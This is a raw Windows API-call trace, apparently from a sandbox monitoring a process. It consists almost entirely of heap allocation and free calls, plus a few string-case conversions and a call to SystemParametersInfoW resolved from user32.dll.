HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0229.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0229.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0229.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0229.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0229.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0229.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0229.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0229.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0229.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0229.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0229.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0229.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0229.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0229.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0229.169] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0229.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0229.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0229.169] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0229.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0229.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0229.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0229.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72298 [0229.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0229.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0229.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0229.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0229.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721d8 [0229.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0229.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0229.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0229.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0229.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0229.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0229.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0229.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0229.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0229.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0229.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0229.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab500 [0229.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0229.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0229.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0229.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0229.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0229.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0229.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0229.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0229.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0229.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0229.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0229.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0229.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0229.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab620 [0229.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4d0 [0229.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0229.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0229.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0229.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0229.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0229.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0229.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0229.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0229.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0229.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0229.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0229.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0229.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5c0 [0229.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6e0 [0229.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0229.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0229.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0229.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0229.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0229.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0229.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0229.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0229.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0229.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0229.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0229.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0229.171] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0229.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0229.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0229.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0229.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0229.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0229.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0229.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0229.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0229.172] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0229.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0229.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0229.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0229.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0229.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0229.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0229.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0229.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0229.172] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0229.172] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0229.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0229.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0229.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0229.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0229.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0229.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0229.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0229.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0229.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0229.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0229.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0229.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0229.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0229.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0229.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0229.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0229.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0229.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0229.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0229.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0229.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0229.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0229.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0229.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0229.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0229.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0229.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0229.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0229.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0229.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0229.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0229.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0229.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0229.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0229.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0229.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0229.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0229.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0229.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0229.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0229.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0229.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0229.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0229.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0229.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0229.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0229.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0229.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0229.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0229.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0229.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0229.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0229.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0229.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0229.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0229.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0229.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0229.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0229.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0229.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0229.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0229.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0229.175] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0229.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0229.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0229.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0229.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0229.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0229.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0229.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0229.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0229.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0229.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0229.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0229.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0229.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0229.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0229.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0229.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0229.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0229.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0229.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0229.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0229.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0229.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0229.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0229.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0229.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0229.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0229.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0229.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0229.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0229.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0229.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0229.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0229.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0229.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0229.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0229.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0229.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0229.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0229.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0229.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0229.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0229.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0229.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0229.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0229.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0229.178] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0229.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0229.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0229.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0229.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f7140 [0229.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f7140, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0229.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0229.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0229.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0229.178] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0229.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0229.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0229.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0229.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0229.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0229.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0229.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0229.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0229.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0229.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0229.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0229.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0229.179] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0229.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865490 [0229.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71a0 [0229.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0229.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0229.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) 